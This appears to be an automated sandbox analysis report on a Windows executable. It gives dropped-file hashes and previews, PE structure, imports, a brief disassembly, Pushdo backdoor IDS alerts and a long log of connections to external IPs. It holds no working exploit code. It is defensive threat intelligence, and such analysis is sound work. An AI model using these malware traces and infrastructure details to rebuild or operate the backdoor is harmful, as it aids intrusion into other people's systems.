                                                                                                                                                                                                                                                                          08:06:45API Interceptor2x Sleep call for process: nhVJ8J5qOt.exe modified
                                                                                                                                                                                                                                                                          08:07:09API Interceptor12x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                          08:07:23API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2701062923235522
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:/l1PL3n:fPL3
                                                                                                                                                                                                                                                                          MD5:CD8FA61AD2906643348EEF98A988B873
                                                                                                                                                                                                                                                                          SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                                                                                                                                                                                                                                                                          SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                                                                                                                                                                                                                                                                          SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:........................................user.
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):1446
                                                                                                                                                                                                                                                                          Entropy (8bit):7.391788435612582
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:EtPRDylUd7BQ8tNSioBME6xfAShHeU7XQYeCMSwnlcOdC9sZmj:EtP5ylUd7BQ8vSLWvQYemwlPdhYj
                                                                                                                                                                                                                                                                          MD5:C13484A01C09621308002DDDA7196A1D
                                                                                                                                                                                                                                                                          SHA1:51F2184EFA65D5DA645903F6A7EC47909C94316B
                                                                                                                                                                                                                                                                          SHA-256:E55DD169E4408885825EDD67C97C9068F43D79E921AEFD7B7679C06F3791EE0F
                                                                                                                                                                                                                                                                          SHA-512:93AD38A75006C90A3F7C713919FE3A96374D4D97AA2CCAAF93D977E575E8913F8ADC30BC6A8B8E39F6B658BCA93ABA8CB492071706E462438A356CCEF6321B20
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O.......x...._D...IS.P.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....-...5.1....[....,...2_wE................ ...x......T........~.,.zT#:,.+..r.......k........u}..[6.E7...`H..h...........nu....[.#,.!.D.t0.....s.C+.P...}...xM...."...LM=..cu.e...~.p;2..x. s.:.qA..oMsV....6..D.`=%...)..&....7\ d7(.............S....L.5...3.A.6e.NWH.=e. .5.h2#M..M-N@.h.$b.P.D..Y.l.[wl/.C.q9.g..|.~!m.l..4-..).....6......V.#..w.s.0.I...........%n0.j4A.<m^[8..|D....\?9...i.".;N..+:.....I..m..)..,...k.Em.B....~.Mr.....P..0.#..%.q...PV....%...F.@F..&.D... ....B\.s....$.6,..!.....5...r...-...".Y#$.>l..8x...~..=...J........A....io.~.r....._/.<....U.!O._...f8E...r.`^J...6..-o;cd.0..lH.b..\.a'h..........F.^..|.........|.08b3r..D.{.5(.....
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):647168
                                                                                                                                                                                                                                                                          Entropy (8bit):7.022298676425434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:5Yntc8mHArau/OS3zTPkob+Kd5eT+vElOOLJDczxIy2nIMzMd:5YntctHA2Y3zTPBZuOCTVnA
                                                                                                                                                                                                                                                                          MD5:2CCA5C1B1F00170BD750694D9511015B
                                                                                                                                                                                                                                                                          SHA1:0488276B184BDC4584BE02F6B53825304EC00F3B
                                                                                                                                                                                                                                                                          SHA-256:65BD8C10CD1DCFB28F173CED5F6DE2E98A5A592E9129A4637D10654951A0D1FC
                                                                                                                                                                                                                                                                          SHA-512:AF0A9460DAA06C7A71C9F47065B57B646A98BB94796E77A64180DDADA9445C0295815E77027F074C35BD7C82D5D970C228517263A01094E5907641283457B54F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V..W...V..W...V..W...V..UV...V..WV..V..VV...V}toV...V...V...V..W...V..[V...V..W...VRich...V........PE..L.....d.....................f......4.............@..........................0............@....................................(...............................4......................................@...............4............................text............................... ..`.rdata........... ..................@..@.data...((..........................@....gfids..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.022298676425434
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          File size:647'168 bytes
                                                                                                                                                                                                                                                                          MD5:2cca5c1b1f00170bd750694d9511015b
                                                                                                                                                                                                                                                                          SHA1:0488276b184bdc4584be02f6b53825304ec00f3b
                                                                                                                                                                                                                                                                          SHA256:65bd8c10cd1dcfb28f173ced5f6de2e98a5a592e9129a4637d10654951a0d1fc
                                                                                                                                                                                                                                                                          SHA512:af0a9460daa06c7a71c9f47065b57b646a98bb94796e77a64180ddada9445c0295815e77027f074c35bd7c82d5d970c228517263a01094e5907641283457b54f
                                                                                                                                                                                                                                                                          SSDEEP:12288:5Yntc8mHArau/OS3zTPkob+Kd5eT+vElOOLJDczxIy2nIMzMd:5YntctHA2Y3zTPBZuOCTVnA
                                                                                                                                                                                                                                                                          TLSH:7AD4F001F842FC66D6A3347F0866C197D12C6E2C4B22CFAB2384DB7BB7541A06F5656B
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V...W...V...W...V...W...V..UV...V..WV...V..VV...V}toV...V...V...V...W...V..[V...V...W...VRich...V........PE..L..
                                                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                          Entrypoint:0x40de34
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                                          Time Stamp:0x64A2B9D5 [Mon Jul 3 12:06:45 2023 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:70358da30a737c94107b030bef3e8be7
                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          call 00007F0ACCB698BEh
                                                                                                                                                                                                                                                                          jmp 00007F0ACCB68E03h
                                                                                                                                                                                                                                                                          cmp ecx, dword ptr [0049DB44h]
                                                                                                                                                                                                                                                                          jne 00007F0ACCB68F75h
                                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                                          jmp 00007F0ACCB6930Ah
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          or ecx, eax
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          jne 00007F0ACCB68F7Bh
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          retn 0010h
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          mov ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          add ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          add edx, ebx
                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                          retn 0010h
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          cmp cl, 00000040h
                                                                                                                                                                                                                                                                          jnc 00007F0ACCB68F87h
                                                                                                                                                                                                                                                                          cmp cl, 00000020h
                                                                                                                                                                                                                                                                          jnc 00007F0ACCB68F78h
                                                                                                                                                                                                                                                                          shld edx, eax, cl
                                                                                                                                                                                                                                                                          shl eax, cl
                                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                                          mov edx, eax
                                                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                                                          and cl, 0000001Fh
                                                                                                                                                                                                                                                                          shl edx, cl
                                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          or eax, eax
                                                                                                                                                                                                                                                                          jne 00007F0ACCB68F9Ah
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                                                                          div ecx
                                                                                                                                                                                                                                                                          mov ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          div ecx
                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                          mov eax, ebx
                                                                                                                                                                                                                                                                          mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                                                                                                          mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          add edx, ecx
                                                                                                                                                                                                                                                                          jmp 00007F0ACCB68FB9h
                                                                                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                                                                                          mov ebx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                                                                                          rcr ebx, 1
                                                                                                                                                                                                                                                                          shr edx, 1
                                                                                                                                                                                                                                                                          rcr eax, 1
                                                                                                                                                                                                                                                                          or ecx, ecx
                                                                                                                                                                                                                                                                          jne 00007F0ACCB68F66h
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5b8c40x28.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x1e0.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa10000x1734.reloc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x5acf00x1c.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5ad100x40.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x134.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          .text0x10000x1801b0x18200False0.5620749676165803data6.575403221283511IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rdata0x1a0000x41f9e0x42000False0.9169514973958334data7.696625589486483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .data0x5c0000x428280x41e00False0.7365690227703985data5.9033104597705215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .gfids0x9f0000xd00x200False0.314453125data1.8716523533358267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rsrc0xa00000x1e00x200False0.525390625data4.692060940173397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .reloc0xa10000x17340x1800False0.7923177083333334data6.598861643262553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                          RT_MANIFEST0xa00600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          KERNEL32.dllCreateFileA, CloseHandle, GetCommandLineA, GetCurrentActCtx, FindFirstFileA, FindNextFileA, GetModuleFileNameA, GetModuleHandleA, GetCurrentProcessId, ReadFile, CreateFileMappingA, ExitProcess, VirtualAlloc, CreateMutexA, ReleaseMutex, MultiByteToWideChar, WideCharToMultiByte, SetHandleInformation, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStringTypeW, GetLastError, SetLastError, GetCurrentThreadId, GetACP, EncodePointer, DecodePointer, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, FreeLibrary, LoadLibraryExW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsValidCodePage, GetOEMCP, GetCPInfo, GetModuleHandleExW, GetProcessHeap, RaiseException, HeapSize, HeapReAlloc, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RtlUnwind, GetStdHandle, WriteFile, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          72.251.233.245192.168.2.680531422037771 07/05/23-08:07:22.438252TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst805314272.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          192.168.2.6172.67.208.6749711802016867 07/05/23-08:05:48.109053TCP2016867ET TROJAN Backdoor.Win32.Pushdo.s Checkin4971180192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          63.251.106.25192.168.2.680502702037771 07/05/23-08:07:09.906290TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst805027063.251.106.25192.168.2.6
                                                                                                                                                                                                                                                                          173.231.184.124192.168.2.680503382037771 07/05/23-08:07:13.008395TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8050338173.231.184.124192.168.2.6
                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.084794998 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.087318897 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.091065884 CEST4970980192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.091869116 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.092101097 CEST4971180192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.100796938 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.108583927 CEST8049711172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.108696938 CEST4971180192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.109052896 CEST4971180192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.121820927 CEST804971080.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.121972084 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.122355938 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.125422001 CEST8049711172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.137147903 CEST8049711172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.137260914 CEST4971180192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.153230906 CEST804971080.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.153352022 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.188262939 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.206334114 CEST804971270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.206440926 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.216469049 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.218606949 CEST804971080.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.218727112 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.223851919 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.321784973 CEST804971270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.322582960 CEST804971270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.322737932 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.348628044 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.352508068 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.356648922 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.356762886 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.357261896 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.373368979 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.379190922 CEST80497133.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.379321098 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.379703045 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.400734901 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.401163101 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.401236057 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.402081966 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.402707100 CEST4971780192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.417558908 CEST804971734.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.418145895 CEST4971780192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.418145895 CEST4971780192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.431963921 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432005882 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432039022 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432060957 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432075977 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432096958 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432112932 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432116985 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432148933 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432153940 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.432188988 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.433000088 CEST804971734.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.458530903 CEST804971270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.458591938 CEST4971280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.507682085 CEST804971734.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.507877111 CEST4971780192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.535990953 CEST80497133.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.536056995 CEST80497133.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.536071062 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.536115885 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.554879904 CEST4971380192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.605878115 CEST4971880192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.627995014 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629050970 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629092932 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629128933 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629146099 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629162073 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629177094 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629187107 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629194021 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629221916 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629225969 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629257917 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629270077 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629290104 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629312038 CEST4970880192.168.2.659.106.19.204
